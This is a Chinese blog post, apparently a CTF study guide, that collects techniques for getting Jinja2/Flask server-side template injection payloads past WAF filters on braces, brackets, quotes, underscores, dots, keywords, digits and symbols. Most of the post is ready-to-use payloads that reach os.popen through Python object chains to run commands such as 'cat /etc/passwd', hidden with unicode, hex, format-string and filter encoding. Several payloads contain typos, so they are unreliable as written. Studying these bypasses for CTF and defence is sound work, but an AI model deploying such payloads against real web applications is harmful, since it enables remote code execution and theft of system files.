最全SSTI模板注入waf绕过总结(6700+字数!)

已于 2023-11-10 18:05:34 修改
阅读量963 收藏 20
点赞数 3
分类专栏: SSTI CTF比赛技巧们 ctf 文章标签: web安全 网络安全 安全威胁分析 安全 网络攻击模型 flask python
于 2023-11-09 01:12:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/134301620
版权
ctf 同时被 3 个专栏收录
26 篇文章 3 订阅
订阅专栏
CTF比赛技巧们
11 篇文章 1 订阅
订阅专栏
SSTI
4 篇文章 1 订阅
订阅专栏

目录:

WAF绕过:

1、{%%}绕过过滤{{}}

2、getitem()绕过[]过滤

3、request方法绕过:

request绕过单双引号过滤

同理单双引号也可以用cookies绕过

4、绕过下划线过滤:

1.使用request方法

2、使用Unicode编码

3、使用十六进制编码

4、同理有base64编码绕过

5、格式化字符串

5、绕过点过滤

1、中括号[]代替点

2、如果中括号也被过滤可以考虑attr()绕过

过滤器:

6、绕过关键字过滤:

1、编码绕过(就是刚刚的Unicode编码那些)

2、"+"拼接

3、Jinjia2中的~拼接

4、过滤器绕过(reverse,replace,join)

过滤器reverse

过滤器replace

过滤器join

5、利用python里的char()

7、绕过数字过滤

8、绕过符号过滤

SSTI混合过滤绕过:

实例解析1——WAF过滤’,”,+,request,[]

实例解析2——WAF过滤’,”,_,0-9,\,.,[],空格

WAF绕过:

1、{%%}绕过过滤{{}}

尝试{%%},想回显内容在外面加个print就行,

{%print("".__class__)%}

2、getitem()绕过[]过滤

getitem() 是python的一个魔术方法,对字典使用时,传入字符串,返回字典相应键所对应的值:当对列表使用时,传入整数返回列表对应索引的值。

原本是[117],中括号被ban就用

__getitem__(117)代替[117]

3、request方法绕过:

request在flask中可以访问基于 HTTP 请求传递的所有信息,这里的request并非python的函数,而是在flask内部的函数。

request.args.key  #获取get传入的key的值

request.form.key  #获取post传入参数(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)

reguest.values.key  #获取所有参数,如果get和post有同一个参数,post的参数会覆盖get

request.cookies.key  #获取cookies传入参数

request.headers.key  #获取请求头请求参数

request.data  #获取post传入参数(Content-Type:a/b)

request.json  #获取post传入json参数 (Content-Type: application/json)

request绕过单双引号过滤

同理单双引号也可以用cookies绕过

{{().__class__.base__.__subclasses__()[117].__init__.__globals__[request.cookies.k1](request.cookies.k2).read()}}

改包添加cookie

Cookie:k1=popen;k2=cat /etc/passwd

4、绕过下划线过滤:

1.使用request方法

GET提交URL?cla=__class__&bas=__base__&sub=__subclasses__&ini=__init__&glo=__globals__&gei=__getitem__

POST提交:

code={{()|attr(request.args.cla)|attr(request.args.bas)|attr(request.args.sub)()|attr(request.args.gei)(117)|attr(lequest.args.ini)|attr(request.args.glo)|attr(request.args.gei)(‘popen’(‘cat /etc/passwd’)attr(‘read’)()}}

2、使用Unicode编码

前置知识:

①‘’|attr(“__class__”)等效于‘’.__class__

②如果要使用xxx.os(‘xxx’)类似的方法,可以使用xxx|attr(“os”)(‘xxx’)

③使用flask里的lipsum方法来执行命令:flask里的lipsum方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块

 Unicode编码的python脚本如下:

class_name = "cat /flag"

unicode_class_name = ''.join(['\\u{:04x}'.format(ord(char)) for char in class_name])

print(unicode_class_name)

payload示例:

url={%print(()|attr(%22\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f%22))%}

(Unicode编码,这条payload等效于{{“”.__class__}}) 

3、使用十六进制编码

{{()[“\x5f\x5fclass\x5f\x5f”][“\x5f\x5finit\x5f\x5f”][“\x5f\x5fglobals\x5f\x5f”][“os”].popen(“ls”).read()}}

这条payload等效于{{“”.__class__.__init__.globals__.os.popen(“ls”).read()}}

4、同理有base64编码绕过

5、格式化字符串

{{()|attr("%c%cclass%c%c"%(95,95,95,95))|attr("%c%cbase%c%c"%(95,95,95,95))|attr("%c%csubclasses%c%c"%(95,95,95,95))()|attr("%c%cgetitem%c%c"%(95,95,95,95))(117)|attr("%c%cinit%c%c"%(95,95,95,95))|attr("%c%cglobals%c%c"%(95,95,95,95))|attr("%c%cgetitem%c%c"%(95,95,95,95))(‘popen’)(‘cat /etc/passwd’)|attr(‘read’)()}}

%c %(95) 即下划线(如果是在 hackbar 注入,需要将%编码为%25。在 URL中%是一个特殊字符,用于表示后面紧跟着两个十六进制数字的转义序列,如果想在 URL中包含%字符本身,需要对它进行额外的编码,将%编码成%25)

5、绕过点过滤

1、中括号[]代替点

{{()[‘class’][‘base’][‘subclasses’]()[117][‘init’][‘globals’][‘popen’](‘ls’)[‘read’]()}}

2、如果中括号也被过滤可以考虑attr()绕过

{{()|attr(‘__class__’)|attr(‘__base__’)|attr(‘__subclasses__’)()|attr(‘__getitem__’)(199)|attr(‘__init__’)|attr(‘__globals__’)|attr(‘__getitem__’)(‘os')|attr(‘popen’)(‘ls’)|attr(‘read’)()}}

过滤器:

flask常用过滤器:

length(): 获取一个序列或者字典的长度并将其返回

int(): 将值转换为int类型;

float():  将值转换为float类型

lower():  将字符串转换为小写

upper():  将字符串转换为大写

reverse():  反转字符串;

replace(value,old,new):  将value中的old替换为new

list():  将变量转换为列表类型,

string():  将变量转换成字符串类型

join():  将一个序列中的参数值拼接成字符串,通常配合dict()混合绕过

attr():  获取对象的属性

tips:

  1. 过滤器通过管道符号(|)与变量连接
  2. 一个过滤器的输出将应用于下一个过滤器

{{ users|upper}}  #把users值转化为大写

{{ users|upper|lower }}  #把users值转化为大写然后转化为小写,最终是小写

6、绕过关键字过滤:

1、编码绕过(就是刚刚的Unicode编码那些)

2、"+"拼接

{{().__class__}}等效于{{()[‘__cla’+’ss__’]}}

{{()[‘__cla’+’ss__’][‘__ba’+’se__’] [ ‘__subc’+’__lasses__’][‘__ get’+’item__’](199)[‘__in’+’it__’][‘__glo’+’bals__’][‘__geti’+’tem__’](‘os’)[‘po’+’pen’](‘ls’)[‘read’]()}}

3、Jinjia2中的~拼接

{{()[‘__class__’]}}等价于{%set a=’__cla’%}{%set b=’ss__’%}{{()[a~b]

{%set a=’__cla’%}{%set b=’ss__%}{%set c=’__ba’%}{%set d=’se__’%}{%set e=’__subcl’%}{%set f=’asses__’%}{%set g=’__in’%}{%set h=’it__’%}{%set l=’__gl’%}{%set i=’obals__%}{%set i=’po’%}{%set k=’pen’%}{{""[a~b][c~d][e~f]()[19][g~h][l~i][‘os’][j~k](‘ls’)[‘read’]()}}

4、过滤器绕过(reverse,replace,join)

过滤器reverse

{{()[‘__class__’]}}等价于{%set a=”__ssalc__”|reverse%}{{()[a]}}

payload可以这么构造:

{%set a=”__ssalc__”|reverse%}{%set b="__esab_
_"|reverse%}{%set c=”__sessalcbus__”|reverse%}{%set d="__ tini__"|reverse%}{%set e=”__slabolg__”|reverse%}{%set f=”nepop”|reverse%}{{""[a][b][c]()[199][d][e][‘os’][f](‘ls’)[‘read’]()}}

过滤器replace

{{()[‘__class__’]}}等价于{%set a=”__claee__”|replace("ee","ss")%}{{()[a]}}

过滤器join

{%set a=dict(__cla=a,ss__=a)|join%}{{()[a]}}

(%set a=[‘__cla’,’ss__’]|join%}{{()[a]}}

5、利用python里的char()

{% set chr=url_for.__globals__[__builtins__].chr %}

(从内置函数里面获取ASCII解码功能,并赋值给变量chr)

构造payload如下:

{{""[chr(95)%2bchr(95)%2bchr(99)%2bchr(108)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(95)%2bchr(95)]}}

(这条payload等效于{{“”.__class__}})

7、绕过数字过滤

首先介绍length过滤器,length过滤器通常用于获取数据结构(比如列表、字典或字符串)的长度。

{% set a=’aaaaaaaaaa’|length %}{{a}}  #10

{% set a=’aaaaaaaaaa’|length*’aaa’|length %}{{a}}  #30

{% set a=’aaaaaaaaaa’|length*’aaaaaaaaaaaa’|length-’aaa’ |length %}{{a}}   #117

10个a*12个a-3个a=117个a

如果数字被过滤可以这样绕过:

{% set a=’aaaaaaaaaa’|length %}{{“”.__class__.__bases__.__subclasses__()[a].__init__.__ globals__[‘os’].popen(“ls”).read()}}

8、绕过符号过滤

利用flask内置函数和对象获取符号

{% set a=({}|select()|string()) %}{{a}} #获取下划线

{% set a=({}|self|string()) %} {{a}} #获取空格

{% set a=(self|string|urlencode) %}{{a}}  #获取百分号

{% set a=(app.__doc__|string) %}{{a}}

SSTI混合过滤绕过:

实例解析1——WAF过滤’,”,+,request,[]

Payload原型:

{{().__class__.__base__}}

绕过:

{% set a=dict(__class__=1)|join%)%}{%set b=dict(__base__=1)|join%}{{()|attr(a)|attr(b)}}

join会把字典(dict)里的键名都拼接起来,至于键的值是什么不重要,可以是__class__=1也可以是__class__=111

最终payload示例:

{% set a=dict(__class__=1)|join%)%}

{%set b=dict(__base__=1)|join%}

{%set c=dict(__subclasses__=1)|join%}

{%set d=dict(__getitem__=1)|join%}

{%set e=dict(in=1,it =2)|join%}

{{%set f=dict( glo=1,bals =2)|join%}

{%set g=dict(popen=1)|join%}

{%set kg={}|select()|string()|attr(d)(10)%}

{%set i=(dict(cat=1)|join,kg,dict(flag=2)|join)|join%)

{%set r=dict(read=1)|join%}

{{()|attr(a)|attr(b)|attr(c)()|attr(d)(117)|attr(e)|attr(f)|attr(d)(g)(i)|attr(r)()}}

实例解析2——WAF过滤’,”,_,0-9,\,.,[],空格

注入{{lipsum|string|list}},如果回显的列表里第9位是空格,第18位是下划线,就可以这样获取下划线:

{%set a=(lipsum|string|list)[18]%}{{a}}

由于中括号被过滤:

{%set a=lipsum|string|list|attr(‘__getitem__’)(18)%}{{a}}

又由于下划线被过滤,可以用'pop’代替 getitem

{%set a=(lipsum|string|list)|attr(‘pop’)(18)%}{{a}}

这个payload是绕过过滤得到的下划线‘_’

同理下例是构造的__globals__:

该混合过滤的最终过滤示例

Payload原型

{{lipsum|attr("__globals__")|attr(“__getitem__”)("os")|attr("popen")("cat flag")|attr("read")()}}

绕过:

{%set nine=dict(aaaaaaaaa=a)|join|count%}

{%set eighteen=nine+nine%}

{%set pop=dict(pop=a)|join%}

{%set xhx=(lipsum|string|list)|attr(pop)(eighteen)%} #(获取下划线)

{%set kg=(lipsum|string|list)|attr(pop)(nine)%}  #(获取空格)

{%set globals=(xhx,xhx,dict(globals=a)|join,xhx,xhx)|join%}

{%set getitem=(xhx,xhx,dict(getitem=a)|join,xhx,xhx)|join%}

{%set os=dict(os=a)|join%}

{%set popen=dict(popen=a)|join%}

{%set flag=(dict(cat=a)|join,kg,dict(flag=a)|join)|join%}

{{flag}}

时代少年团队长乌萨奇的颜值一直被质疑
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SSTI模板注入详细总结WAF绕过_fenjing ssti(1)
m0_61072747的博客
04-08 1068
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
2024年最全SSTI模板注入详细总结WAF绕过_fenjing ssti(3),2024年最新已开源
最新发布
2401_84253894的博客
05-05 948
{{‘’.class__}}里的两个单引号意思是随便找一个对象,我们会在网上看到别人的wp有时候是{{().class__}},{{“”.class__}}或者{{[].class__}}区别只是包裹的是字符,元组还是列表,仅是返回的数据类型不同,本质无区别,如果被过滤可以互相替代。如果等保模块学的好,还可以从事等保工程师。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
SSTI模板注入详细总结WAF绕过
2301_76690905的博客
11-15 1640
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过(ctfshow web入门370)
T1ngSh0w的博客
03-30 1324
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 1628
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 1691
SSTI总结:流程和绕过
ctf ssti 各种payload与绕过(后续会补充 绕过
m0_59855041的博客
06-07 431
_class__ 返回一个实例所属的类__mro__ 查看类继承的所有父类,直到object__subclasses__() 获取一个类的子类,返回的是一个列表__bases__ 返回一个类直接所继承的类(元组形式)__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化__globals__ 使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典,与func_globals等价。
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Flask SSTI/沙箱逃逸的一些总结
01-20
模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期...
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
SSIT模板注入
RuiLike的博客
07-02 410
存在这三种语法控制结构 {% %}变量取值 {{ }}注释 {# #}
SSTI模板注入绕过姿势(基于Python-Jinja2)
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
ssti注入绕过ssti靶场过关
2202_75361164的博客
10-09 284
普通的cookie并不安全,可以通过客户端修改在Tornado框架中,cookie_secret是一个密钥,一般使用随机生成的字符串,被用于对生成的cookie进行加密。它的作用是确保cookie的安全性,防止被修改或伪造。具体来说,当Tornado应用程序使用set_secure_cookie()函数设置cookie时,会使用cookie_secret对cookie进行加密。而在获取cookie时,Tornado则会使用同样的密钥进行解密,并验证cookie是否被篡改。
ssti模板注入
m0_73973498的博客
11-17 130
当使用len(obj)时,实际上调用的就是obj.__len__方法,其它同理。.__globals__['__builtins__']['eval']:查获取该类的全局变量,得到其中的builtins,取其中的eval函数(一个实现细节,大多数模块都将名称__builtins__作为其全局变量的一部分提供).__globals__['__builtins__']不能写成.__globals__.|attr('__builtins__'),如果想要获取索引,就需要使用__getitem__魔术方法。
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1598
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
Python Flask SSTI 之 长度限制绕过
weixin_43995419的博客
09-12 943
Python flask SSTI 之 长度限制绕过
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值